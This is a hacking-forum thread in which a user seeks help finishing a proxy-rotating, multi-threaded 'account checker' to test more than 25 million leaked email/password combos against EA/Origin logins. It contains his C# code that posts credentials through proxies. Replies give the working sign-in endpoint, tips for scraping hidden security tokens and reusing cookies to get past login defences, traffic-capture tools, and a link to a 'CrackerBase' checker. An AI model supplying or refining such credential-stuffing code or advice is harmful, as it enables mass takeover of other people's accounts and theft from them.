UnresolvedAccount Checker

Posts 115 of 15 · Page 1 of 1
Account Checker
Currently working on an Account Checker. I have made pretty much the whole program with multi-thread compatibility etc, just stuck on the bit of finding which url to send the email/pass combo to check if its valid/ how to find it in the future. Currently making an Origin/EA Checker. I have around 25mil+ Combos ready to check for EA accounts. Wonderin if anyone can help? My connection code:

Code:
var proxy = new WebProxy(j.Item1, Port: int.Parse(j.Item2));
                            byte[] data = Encoding.ASCII.GetBytes(
                                $"username={i.Item1}&password={i.Item2}");

                            WebRequest request = WebRequest.Create("https://profile.ea.com/");
                            request.Method = "POST";
                            request.ContentType = "application/x-www-form-urlencoded";
                            request.Proxy = proxy;
                            request.ContentLength = data.Length;
                            using (Stream stream = request.GetRequestStream())
                            {
                                stream.Write(data, 0, data.Length);
                            }

                            string responseContent = null;

                            using (WebResponse response = request.GetResponse())
                            {
                                using (Stream stream = response.GetResponseStream())
                                {
                                    using (StreamReader sr99 = new StreamReader(stream))
                                    {
                                        responseContent = sr99.ReadToEnd();
                                    }
                                }
                            }
use xNet.dll better and faster to make POST/GET requests
How is this even related to what the OP posted?
Quote Originally Posted by Zaczero View Post
This one gave me some redirection going on (success?):


Request URL:
https://signin.ea.com/p/web2/login?e...locale%3Den_US


When creating custom requests you should look for <input> with name like this:

+ you should learn basics of HTML Form
You should note that some websites have security tokens that require you to enter that page before posting the credentials.
Quote Originally Posted by Silent View Post


You should note that some websites have security tokens that require you to enter that page before posting the credentials.
this one doesn't have
Quote Originally Posted by Zaczero View Post


this one doesn't have
Just for future reference
Quote Originally Posted by Silent View Post


You should note that some websites have security tokens that require you to enter that page before posting the credentials.
How to solve that problem if they have security token ?
Quote Originally Posted by crypticgod View Post
How to solve that problem if they have security token ?
download page content and fetch the security token
they are usually stored as a value in hidden input
Quote Originally Posted by Zaczero View Post


download page content and fetch the security token
they are usually stored as a value in hidden input
Is it good to learn c# or python for cracking / making checkers ??

i am bit confused ..can i contact you on skype
Quote Originally Posted by crypticgod View Post
Is it good to learn c# or python for cracking / making checkers ??

i am bit confused ..can i contact you on skype
I don't know python very well :P
I haven't done any checkers too
But yeah, my Skype is: mrzaczer0
I'm good at c#
Check out my checker base that I made on github/justsum1uknow/CrackerBase

Also some sites use cookies, make sure you make a GET request and store the cookie, then use the cookie in your post request.
Good Job Working On That
Quote Originally Posted by ZeusAlmighty View Post
Currently working on an Account Checker. I have made pretty much the whole program with multi-thread compatibility etc, just stuck on the bit of finding which url to send the email/pass combo to check if its valid/ how to find it in the future. Currently making an Origin/EA Checker. I have around 25mil+ Combos ready to check for EA accounts. Wonderin if anyone can help? My connection code:

Code:
var proxy = new WebProxy(j.Item1, Port: int.Parse(j.Item2));
                            byte[] data = Encoding.ASCII.GetBytes(
                                $"username={i.Item1}&password={i.Item2}");

                            WebRequest request = WebRequest.Create("https://profile.ea.com/");
                            request.Method = "POST";
                            request.ContentType = "application/x-www-form-urlencoded";
                            request.Proxy = proxy;
                            request.ContentLength = data.Length;
                            using (Stream stream = request.GetRequestStream())
                            {
                                stream.Write(data, 0, data.Length);
                            }

                            string responseContent = null;

                            using (WebResponse response = request.GetResponse())
                            {
                                using (Stream stream = response.GetResponseStream())
                                {
                                    using (StreamReader sr99 = new StreamReader(stream))
                                    {
                                        responseContent = sr99.ReadToEnd();
                                    }
                                }
                            }
Man i should really get back to coding, Haven't coded in years
You can use google chrome extensions like postman that really helps capture the information needed to use when posting.

Or other tools such as HTTP Analyzer, Fiddler, HTTP Pro ect there are many out there and will help you a lot in the future specially if there are any intermediate urls needed to grab tokens before logging in.
Posts 115 of 15 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?